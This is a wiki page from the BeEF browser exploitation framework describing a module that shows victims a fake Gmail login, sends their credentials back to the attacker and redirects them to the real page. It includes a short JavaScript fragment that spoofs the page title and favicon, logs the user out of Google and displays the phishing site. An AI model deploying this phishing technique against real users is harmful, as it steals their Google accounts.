Clone
Module: Google Phishing
Haoxi Tan edited this page 2020-01-09 16:09:18 +10:00

Summary

  • Objective: Phish gmail credentials

  • Authors: floyd

  • Browsers: Chrome

  • Code

Internal Working

User is presented with a login page for gmail. When the user enters credentials they are sent back to beef, and they are redirected to the real gmail login page (where they are prompted for their login again)


beef.execute(function() {
        document.title = "Google Mail: Email from Google";
        beef.browser.changeFavicon("https://www.google.com/mail/help/images/favicon.ico");
        logoutGoogle();
    displayPhishingSite();
});

Screenshots

Images/gmail_phish.png

Feedback